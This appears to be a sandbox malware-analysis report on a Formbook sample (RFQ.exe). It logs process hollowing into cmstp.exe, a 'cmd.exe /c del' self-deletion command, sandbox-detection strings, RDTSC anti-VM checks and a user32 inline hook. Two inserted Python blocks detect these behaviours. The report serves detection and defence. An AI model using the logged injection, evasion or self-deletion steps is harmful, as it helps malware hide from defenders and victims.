Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF99D0 NtCreateProcessEx, | 6_2_04DF99D0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9950 NtQueueApcThread, | 6_2_04DF9950
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9A80 NtOpenDirectoryObject, | 6_2_04DF9A80
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9A10 NtQuerySection, | 6_2_04DF9A10
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9A00 NtProtectVirtualMemory, | 6_2_04DF9A00
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9A20 NtResumeThread, | 6_2_04DF9A20
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DFA3B0 NtGetContextThread, | 6_2_04DFA3B0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9B00 NtSetValueKey, | 6_2_04DF9B00
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D39E80 NtClose, | 6_2_02D39E80
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D39E00 NtReadFile, | 6_2_02D39E00
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D39F30 NtAllocateVirtualMemory, | 6_2_02D39F30
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D39D50 NtCreateFile, | 6_2_02D39D50
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D39E4B NtReadFile, | 6_2_02D39E4B
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D39F2A NtAllocateVirtualMemory, | 6_2_02D39F2A
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D39DA2 NtCreateFile, | 6_2_02D39DA2
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_00D2C21C | 0_2_00D2C21C
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_00D2EBF4 | 0_2_00D2EBF4
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_00D2EBF8 | 0_2_00D2EBF8
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00401030 | 1_2_00401030
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0041E0A6 | 1_2_0041E0A6
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0041D18B | 1_2_0041D18B
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0041D33A | 1_2_0041D33A
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0041DBCB | 1_2_0041DBCB
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00409DEA | 1_2_00409DEA
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00402D90 | 1_2_00402D90
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00409E30 | 1_2_00409E30
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0041E6D0 | 1_2_0041E6D0
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0041D75B | 1_2_0041D75B
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00402FB0 | 1_2_00402FB0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04E74496 | 6_2_04E74496
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04E7D466 | 6_2_04E7D466
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DDB477 | 6_2_04DDB477
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DC841F | 6_2_04DC841F
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04E825DD | 6_2_04E825DD
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DCD5E0 | 6_2_04DCD5E0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DE2581 | 6_2_04DE2581
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04E72D82 | 6_2_04E72D82
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04E81D55 | 6_2_04E81D55
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04E82D07 | 6_2_04E82D07
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DB0D20 | 6_2_04DB0D20
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04E82EF7 | 6_2_04E82EF7
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DD5600 | 6_2_04DD5600
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DD6E30 | 6_2_04DD6E30
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04E7D616 | 6_2_04E7D616
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04E81FF1 | 6_2_04E81FF1
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04E8DFCE | 6_2_04E8DFCE
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04E828EC | 6_2_04E828EC
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04E820A8 | 6_2_04E820A8
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DCB090 | 6_2_04DCB090
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DE20A0 | 6_2_04DE20A0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04E8E824 | 6_2_04E8E824
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04E71002 | 6_2_04E71002
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DDA830 | 6_2_04DDA830
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DD99BF | 6_2_04DD99BF
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DBF900 | 6_2_04DBF900
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DD4120 | 6_2_04DD4120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E74AEF6_2_04E74AEF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E822AE6_2_04E822AE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E6FA2B6_2_04E6FA2B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDB2366_2_04DDB236
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E623E36_2_04E623E3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEABD86_2_04DEABD8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E7DBD26_2_04E7DBD2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E703DA6_2_04E703DA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDEB9A6_2_04DDEB9A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE138B6_2_04DE138B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEEBB06_2_04DEEBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDAB406_2_04DDAB40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E5CB4F6_2_04E5CB4F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E82B286_2_04E82B28
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDA3096_2_04DDA309
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D3E0A66_2_02D3E0A6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D3E6D06_2_02D3E6D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D29E306_2_02D29E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D22FB06_2_02D22FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D29DEA6_2_02D29DEA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D22D906_2_02D22D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 04DBB150 appears 145 times
          Source: RFQ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: RFQ.exeBinary or memory string: OriginalFilename vs RFQ.exe
          Source: RFQ.exe, 00000000.00000002.237403943.00000000003F2000.00000002.00020000.sdmpBinary or memory string: OriginalFilename6 vs RFQ.exe
          Source: RFQ.exe, 00000000.00000002.241884570.00000000059C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs RFQ.exe
          Source: RFQ.exeBinary or memory string: OriginalFilename vs RFQ.exe
          Source: RFQ.exe, 00000001.00000002.273202915.0000000001D7F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
          Source: RFQ.exe, 00000001.00000002.272895759.0000000001698000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs RFQ.exe
          Source: RFQ.exe, 00000001.00000002.272309435.0000000000E32000.00000002.00020000.sdmpBinary or memory string: OriginalFilename6 vs RFQ.exe
          Source: RFQ.exeBinary or memory string: OriginalFilename6 vs RFQ.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.487639591.0000000002D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.487639591.0000000002D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.272791500.00000000014B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.272791500.00000000014B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.486767546.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.486767546.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.272273185.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.272273185.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.272819143.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.272819143.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@4/2
          Source: C:\Users\user\Desktop\RFQ.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ.exe.logJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeMutant created: \Sessions\1\BaseNamedObjects\vCCFQQCsy
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4120:120:WilError_01
          Source: RFQ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RFQ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: RFQ.exeVirustotal: Detection: 39%
          Source: RFQ.exeReversingLabs: Detection: 52%
          Source: unknownProcess created: C:\Users\user\Desktop\RFQ.exe 'C:\Users\user\Desktop\RFQ.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\RFQ.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Users\user\Desktop\RFQ.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ.exe'Jump to behavior
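The process-creation lines above form a recognisable chain: RFQ.exe relaunches its own image, cmstp.exe starts with no arguments at all, and that cmstp.exe spawns cmd.exe to delete the original sample. The following is an added example written for this page, not code from the report or from the sample: detection logic for those three behaviours, run over constructed process-creation records. The record layout (pid, ppid, image, cmdline), the pids of the parents and the benign cmstp.exe control record are assumptions, not a Sysmon schema.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the executable that was started
    cmdline: str   # command line exactly as logged


# Constructed records modelled on the report's "Process created" lines; the
# parent pids 1000 and 2000 are placeholders, and the last record is a benign
# cmstp.exe launch added as a control.
SAMPLE_EVENTS = [
    ProcEvent(6524, 1000, r"C:\Users\user\Desktop\RFQ.exe", r"'C:\Users\user\Desktop\RFQ.exe'"),
    ProcEvent(6540, 6524, r"C:\Users\user\Desktop\RFQ.exe", r"C:\Users\user\Desktop\RFQ.exe"),
    ProcEvent(3412, 2000, r"C:\Windows\SysWOW64\cmstp.exe", r"C:\Windows\SysWOW64\cmstp.exe"),
    ProcEvent(4100, 3412, r"C:\Windows\SysWOW64\cmd.exe", r"/c del 'C:\Users\user\Desktop\RFQ.exe'"),
    ProcEvent(5000, 1000, r"C:\Windows\System32\cmstp.exe", r"C:\Windows\System32\cmstp.exe /s C:\Temp\vpn.inf"),
]

# `del [/switches] <path>`; the path may be wrapped in single or double quotes.
DEL_RE = re.compile(r'''(?i)\bdel\b\s+(?:/\w\s+)*['"]?([^'"]+?)['"]?\s*$''')


def args_after_image(ev: ProcEvent) -> str:
    """Return the command line with the leading image token (quoted or bare) removed."""
    cl = ev.cmdline.strip()
    for form in (f"'{ev.image}'", f'"{ev.image}"', ev.image):
        if cl.lower().startswith(form.lower()):
            return cl[len(form):].strip()
    return cl


def detect(events):
    """Return (rule, pid) hits for the three behaviours the report lists."""
    by_pid = {e.pid: e for e in events}
    known_images = {e.image.lower() for e in events}
    hits = []
    for e in events:
        name = ntpath.basename(e.image).lower()
        parent = by_pid.get(e.ppid)
        # 1. A parent starting a second copy of its own image: the pattern
        #    behind "RFQ.exe -> RFQ.exe {path}" that precedes hollowing.
        if parent is not None and parent.image.lower() == e.image.lower():
            hits.append(("self_spawn_same_image", e.pid))
        # 2. cmstp.exe normally receives an .inf path and switches; a bare
        #    launch with no arguments is the injection-target pattern above.
        if name == "cmstp.exe" and args_after_image(e) == "":
            hits.append(("cmstp_without_arguments", e.pid))
        # 3. cmd.exe deleting the on-disk image of a process seen in the same
        #    telemetry: the sample removing itself after injecting.
        if name == "cmd.exe":
            m = DEL_RE.search(args_after_image(e))
            if m and m.group(1).strip().lower() in known_images:
                hits.append(("deletes_logged_image", e.pid))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Rule 2 is the one that survives renaming: whichever system binary the injector picks, a Windows utility that always takes arguments being started with none is the observable. Rule 3 needs the image path of the deleted file to appear elsewhere in the same telemetry window, so keep the lookback long enough to cover the sleep delays listed later in this report.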
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
Source: C:\Users\user\Desktop\RFQ.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: RFQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: RFQ.exe | Static file information: File size 1214976 > 1048576
Source: RFQ.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: RFQ.exe, 00000001.00000002.272895759.0000000001698000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000001.00000002.272969501.0000000001AD0000.00000040.00000001.sdmp, cmstp.exe, 00000006.00000002.488430968.0000000004D90000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RFQ.exe, 00000001.00000002.272969501.0000000001AD0000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: RFQ.exe, 00000001.00000002.272895759.0000000001698000.00000004.00000020.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: RFQ.exe, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.RFQ.exe.3f0000.0.unpack, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.RFQ.exe.3f0000.0.unpack, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.RFQ.exe.e30000.1.unpack, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.RFQ.exe.e30000.0.unpack, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_004178E5 pushfd ; ret 1_2_004178E6
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00416A7F push ecx; ret 1_2_00416B48
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00416AE7 push ecx; ret 1_2_00416B48
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00416ABB push ecx; ret 1_2_00416B48
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00416B4B push ecx; ret 1_2_00416B48
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00417B5E push ecx; ret 1_2_00417BBC
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0041E61C push esi; ret 1_2_0041E6C4
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0041E6C5 push esi; ret 1_2_0041E6C4
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0041E6D0 push esi; ret 1_2_0041E6C4
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0041CEF2 push eax; ret 1_2_0041CEF8
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0041CEFB push eax; ret 1_2_0041CF62
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0041CEA5 push eax; ret 1_2_0041CEF8
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0041CF5C push eax; ret 1_2_0041CF62
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00416FDF push ss; retf 1_2_00416FF3
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04E0D0D1 push ecx; ret 6_2_04E0D0E4
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D36AE7 push ecx; ret 6_2_02D36B48
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D36ABB push ecx; ret 6_2_02D36B48
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D36A7F push ecx; ret 6_2_02D36B48
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D37B5E push ecx; ret 6_2_02D37BBC
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D36B4B push ecx; ret 6_2_02D36B48
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D378E5 pushfd ; ret 6_2_02D378E6
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D3E6D0 push esi; ret 6_2_02D3E6C4
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D3E6C5 push esi; ret 6_2_02D3E6C4
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D3CEF2 push eax; ret 6_2_02D3CEF8
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D3CEFB push eax; ret 6_2_02D3CF62
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D3CEA5 push eax; ret 6_2_02D3CEF8
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D3E61C push esi; ret 6_2_02D3E6C4
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D36FDF push ss; retf 6_2_02D36FF3
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02D3CF5C push eax; ret 6_2_02D3CF62

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE3
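The signature above is produced by comparing a function's first bytes in the live process with the clean bytes of the same function. Below is an added example written for this page, not code from the report or from the sample, that performs that comparison and, when the prologue differs, decodes it against the usual trampoline encodings to recover where control is redirected. Every byte string is constructed: the "clean" PeekMessageA prologue is an assumption and is not taken from any Windows build, while the six PeekMessageA bytes are the ones the report lists.

```python
import struct

MASK64 = (1 << 64) - 1


def classify_hook(func_va: int, in_memory: bytes, on_disk: bytes) -> dict:
    """Compare prologues; if they differ, try to recover the redirection target.

    func_va is the address the function is mapped at, needed to resolve
    rel32 and rip-relative displacements.
    """
    if in_memory[:len(on_disk)] == on_disk:
        return {"hooked": False, "kind": None, "target": None}
    res = {"hooked": True, "kind": "unknown", "target": None}
    b = in_memory
    if len(b) >= 5 and b[0] == 0xE9:                      # jmp rel32
        rel = struct.unpack_from("<i", b, 1)[0]
        res.update(kind="jmp_rel32", target=(func_va + 5 + rel) & MASK64)
    elif len(b) >= 6 and b[:2] == b"\xFF\x25":            # jmp qword ptr [rip+disp32] (x64)
        disp = struct.unpack_from("<i", b, 2)[0]
        # the destination pointer lives in memory; record the slot to read it from
        res.update(kind="jmp_rip_indirect", target=(func_va + 6 + disp) & MASK64)
    elif len(b) >= 12 and b[:2] == b"\x48\xB8" and b[10:12] == b"\xFF\xE0":  # mov rax, imm64; jmp rax
        res.update(kind="mov_rax_jmp_rax", target=struct.unpack_from("<Q", b, 2)[0])
    elif len(b) >= 6 and b[0] == 0x68 and b[5] == 0xC3:   # push imm32; ret (x86)
        res.update(kind="push_ret", target=struct.unpack_from("<I", b, 1)[0])
    return res


def find_hooked(exports: dict) -> dict:
    """exports maps name -> (va, bytes_in_memory, bytes_on_disk); returns the hooked ones."""
    out = {}
    for name, (va, mem, disk) in exports.items():
        r = classify_hook(va, mem, disk)
        if r["hooked"]:
            out[name] = r
    return out


# Constructed table. CLEAN_PROLOGUE is assumed. PeekMessageA carries the six bytes
# the report lists, which match none of the trampoline forms decoded above;
# SendMessageA carries a jmp rel32 to func_va + 0x1000.
CLEAN_PROLOGUE = b"\x48\x89\x5C\x24\x08\x48\x89\x74\x24\x10"
SAMPLE_EXPORTS = {
    "PeekMessageA": (0x7FF8_0001_1000, bytes.fromhex("488bb88aaee3") + CLEAN_PROLOGUE[6:], CLEAN_PROLOGUE),
    "GetMessageA":  (0x7FF8_0001_2000, CLEAN_PROLOGUE, CLEAN_PROLOGUE),
    "SendMessageA": (0x7FF8_0001_3000, b"\xE9\xFB\x0F\x00\x00" + CLEAN_PROLOGUE[5:], CLEAN_PROLOGUE),
}

if __name__ == "__main__":
    for name, r in find_hooked(SAMPLE_EXPORTS).items():
        print(name, r["kind"], hex(r["target"]) if r["target"] is not None else "-")
```

Against a real process the on-disk bytes have to come from the module mapped the way the loader maps it (sections at their virtual addresses, relocations applied), otherwise every relocated absolute address is reported as a hook. A hit whose decoded target lies outside any loaded module's image range, as the injected code in explorer.exe would, is the case worth escalating.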
Source: C:\Users\user\Desktop\RFQ.exe | Process information set: NOOPENFILEERRORBOX (31 identical entries)
Source: C:\Windows\SysWOW64\cmstp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match | File source: Process Memory Space: RFQ.exe PID: 6524, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\RFQ.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\RFQ.exe | RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
